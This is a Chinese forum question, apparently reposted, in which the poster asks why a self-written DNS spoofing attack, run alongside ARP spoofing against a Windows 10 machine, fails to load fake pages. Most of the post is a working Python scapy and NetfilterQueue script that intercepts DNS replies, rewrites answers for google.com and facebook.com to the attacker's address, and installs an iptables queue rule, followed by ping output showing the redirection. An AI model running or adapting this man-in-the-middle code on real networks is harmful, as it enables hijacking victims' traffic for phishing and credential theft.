如何解决DNS欺骗攻击不会加载任何假页面
我制作了一个使用python进行ARP欺骗和DNS欺骗的python程序。
我正在使用两台真实的机器
主机:Archlinux(10.20.3.4)
受害者:Windows 10企业版(10.20.3.5)
当我同时执行两个程序和ARP时,它更改了受害机器中路由器的mac。 DNS欺骗似乎可以正常工作,但是当我加载页面时,我只是“无法加载”,但是当我在受害IP中ping主机IP时,它就可以正常工作了。但我无法重定向页面
DNS欺骗程序:
from scapy.all import *
from netfilterqueue import NetfilterQueue
import os
dns_hosts = {
b"www.google.com.": "10.20.3.4",b"google.com.": "10.20.3.4",b"facebook.com.": "10.20.3.4"
}
def process_packet(packet):
scapy_packet = IP(packet.get_payload())
if scapy_packet.haslayer(DNSRR):
print("[Before]:",scapy_packet.summary())
try:
scapy_packet = modify_packet(scapy_packet)
except IndexError:
pass
print("[After ]:",scapy_packet.summary())
print(packet.set_payload(bytes(scapy_packet)))
packet.accept()
def modify_packet(packet):
qname = packet[DNSQR].qname
if qname not in dns_hosts:
print("no modification:",qname)
return packet
packet[DNS].an = DNSRR(rrname=qname,rdata=dns_hosts[qname])
packet[DNS].ancount = 1
del packet[IP].len
del packet[IP].chksum
del packet[UDP].len
del packet[UDP].chksum
return packet
QUEUE_NUM = 0
os.system("iptables -I FORWARD -j NFQUEUE --queue-num {}".format(QUEUE_NUM))
queue = NetfilterQueue()
try:
queue.bind(QUEUE_NUM,process_packet)
queue.run()
except KeyboardInterrupt:
os.system("iptables --flush")
Ping结果:
Pinging www.bing.com [10.20.3.4] with 32 bytes of data:
Reply from 10.20.3.4: bytes=32 time<1ms TTL=64
Reply from 10.20.3.4: bytes=32 time=1ms TTL=64
Ping statistics for 10.20.3.4:
Packets: Sent = 2,Received = 2,Lost = 0
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。